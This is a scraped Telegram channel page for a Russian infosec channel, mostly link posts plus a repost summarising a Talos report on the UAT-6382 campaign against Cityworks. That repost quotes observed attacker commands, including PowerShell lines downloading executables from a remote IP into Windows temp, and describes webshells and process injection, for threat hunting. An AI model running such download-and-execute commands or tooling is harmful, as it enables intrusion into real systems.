Fsecurity | HH

الذهاب إلى القناة على Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

2 017

المشتركون

-224 ساعات

+27 أيام

-1230 أيام

119

عرض المشاهدات

~ 6524 ساعات

~ 8048 ساعات

5.90%

معدل المشاركة

~ 3

المشاركات في اليوم

Ads index

beta

أرشيف المشاركات

2 017

🔗Ссылка: https://github.com/rstcloud/awesome-threat-actor-resources

2 017

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 017

🔗Ссылка: https://www.securitylab.ru/news/559773.php

2 017

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/910626/

2 017

🔗Ссылка: https://habr.com/ru/companies/kaspersky/articles/912940/

2 017

🔗Ссылка: https://habr.com/ru/articles/913004/

2 017

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 017

🔗Ссылка: https://habr.com/ru/articles/913076/

2 017

🔗Ссылка: https://spy-soft.net/find-ip-address-telegram/

2 017

Repost from Proxy Bar

C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало

iptables -A INPUT -m geoip --src-cc RU,CN -j DROP

2 017

🔗Ссылка: https://www.securitylab.ru/news/559744.php

2 017

Repost from Threat Hunting Father 🦔

⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США. 🧰 Инструментарий 🔸 WebShells AntSword, Chopper (chinatso), Behinder — размещаются в inetpub\wwwroot, используются как бэкдоры. 🔸 TetraLoader (загрузчик на Rust) Скомпилирован с использованием MaLoader — malware-билдера. Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`, dllhost.exe, gpupdate.exe`) через `NtMapViewOfSection, RtlCreateUserThread и др. 🔸 Payloads Cobalt Strike Beacons — используют HTTPS C2 (например, cdn[.]lgaircon[.]xyz`) и маскируются под .js`-запросы. VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском. 🔎 Hunting Notes 🔹 Обнаруженные команды:

cmd.exe /c ipconfig cmd.exe /c pwd cmd.exe /c dir cmd.exe /c dir .. cmd.exe /c dir c:\ cmd.exe /c dir c:\inetpub cmd.exe /c tasklist cmd.exe /c dir c:\inetpub\wwwroot cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite\Assets cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\ cmd.exe /c copy c:\inetpub\wwwroot\CityworksServer\<backup_archives> c:\inetpub\wwwroot\CityworksServer\Uploads\ powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/LVLWPH.exe' -OutFile '<путь>\LVLWPH.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/MCUCAT.exe' -OutFile 'C:\windows\temp\z1.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/TJPLYT.exe' -OutFile 'C:\windows\temp\z33.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/z44.exe' -OutFile 'C:\windows\temp\z44.exe'

🔹 Что ещё искать: PowerShell с Invoke-WebRequest к IP-адресам Размещение ASP/ASPX файлов в inetpub\wwwroot Инъекции в dllhost.exe, gpupdate.exe, notepad.exe C2-домены Запросы к URI вроде /jquery-3.3.1.min.js, /owa/... — подделка под легитимный JS-трафик Rust-бинарники со встроенным shellcode и артефактами MaLoader 🔗https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/ 🦔 THF